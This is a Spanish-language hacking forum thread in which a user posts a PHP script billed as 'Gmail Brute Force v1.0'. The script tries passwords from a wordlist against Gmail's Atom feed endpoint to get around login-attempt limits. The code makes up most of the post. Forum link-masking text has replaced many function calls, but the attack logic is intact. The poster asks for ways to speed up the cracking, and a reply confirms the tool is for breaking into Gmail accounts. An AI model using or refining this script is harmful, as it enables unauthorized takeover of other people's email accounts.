comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Gmail Brute Force v1.0 - Sec-w.com

  • 2 Respuestas
  • 2353 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« en: Octubre 09, 2012, 11:44:24 pm »
Últimamente estoy interesado en el tema de Fuerza Bruta a Correos Electrónicos,  el primero de mi lista es Gmail, así que he probado
algunas aplicaciones que realizan fuerza bruta como: Hydra, Brutus, Bruter entre otros.

Se sabe que Gmail solo te da 5 o 7 intentos para colocar tu passord, luego de eso te pide comprobaciones a través de códigos. así que de que
valdría hacer un ataque de Fuerza Bruta con un diccionario de 5 a 7 palabras por día (seria algo desesperante), pero aun no es el fin.
asi que para ese problema se podria utilizar cURL No tienes permisos para ver links. Registrate o Entra con tu cuenta con la cual los intentos de 5 a 7 para probar un posible password desaparecen.

Gmail Brute Force V1.0, Creada por s3n4t00r de sec-w.com hace posible esto:



lo he testeado y va bien, pero como ya saben no todo es fácil, los correos de Gmail que están protegidos por la famosa seguridad de
2 o 3 pasos (no recuerdo bien XD) <la cual es o consiste en enviarte o llamarte y facilitarte un código de (06) dígitos al un numero de
celular para confirmar el acceso de la persona legitima>; No son blancos para esta aplicación.

asi que sin mas preambulos les dejo el codigo:

Código: PHP
  1. <?php
  2.  
  3. /*
  4.  
  5.    author..............: s3n4t00r
  6.    home................: sec-w.com
  7.    Toolname............: Gmail Brute Force v1.0
  8.    Demonstration ......: http://youtu.be/QdEvoJdENBY
  9.  
  10.  
  11.  
  12. */
  13. No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  14.  
  15. No tienes permisos para ver links. Registrate o Entra con tu cuenta ("
  16.  
  17. #---------------------------------------->
  18. # ToolName      : Gmail Brute Force v1.0
  19. #
  20. # Programmed    : s3n4t00r
  21. #
  22. # Home          : Sec-w.com
  23. #---------------------------------------->
  24. \n\n");
  25.  
  26.  
  27. if ($argc < 3)
  28. {
  29.             print "\nUsage......: php $argv[0] <mail> <list pass>\n";
  30.             print "\nExample....: php $argv[0] s3n4t00r@gmail.com pass.txt \n";
  31.             No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  32. }
  33.  
  34.  
  35. function sws_gmail($mail,$pass){
  36.  
  37. $ch = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  38. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_URL, 'https://mail.google.com/mail/feed/atom');
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_USERPWD, $mail.':'.$pass);
  40. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  41. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_SSL_VERIFYPEER, false);
  42. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_RETURNTRANSFER, 1);
  43. No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLOPT_TIMEOUT, 4);
  44. $result = No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch);
  45. $returnCode = (int)No tienes permisos para ver links. Registrate o Entra con tu cuenta($ch, CURLINFO_HTTP_CODE);
  46.  
  47. return $returnCode;
  48. }
  49.  
  50. No tienes permisos para ver links. Registrate o Entra con tu cuenta($mail, $list,) = No tienes permisos para ver links. Registrate o Entra con tu cuenta($argv[1], $argv[2]);
  51.  
  52. $lists = No tienes permisos para ver links. Registrate o Entra con tu cuenta($list);
  53.  
  54. foreach ($lists as $pass){
  55.  
  56.          $gmail = sws_gmail($mail,No tienes permisos para ver links. Registrate o Entra con tu cuenta($pass));
  57.          echo "[+]Testing -> ".$pass."\n";
  58.          if($gmail == '200'){
  59.  
  60.             echo "[+]Password Cracked -> ".$pass;
  61.             No tienes permisos para ver links. Registrate o Entra con tu cuenta("\n");
  62.          }
  63. }
  64.  
  65. No tienes permisos para ver links. Registrate o Entra con tu cuenta("# Failed");
  66.  
  67. ?>


Creditos: s3n4t00r

Saludos.

PD: si alguno de ustedes sabrían como mejorar el código, especialmente en la parte de rapidez en las comprobaciones
       de los password, seria algo genial.

Atte. Aryenal
« Última modificación: Octubre 25, 2013, 11:21:49 pm por Expermicid »

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Octubre 10, 2012, 01:49:39 am »
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #2 en: Octubre 10, 2012, 03:20:36 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?
si.

 

¿Te gustó el post? COMPARTILO!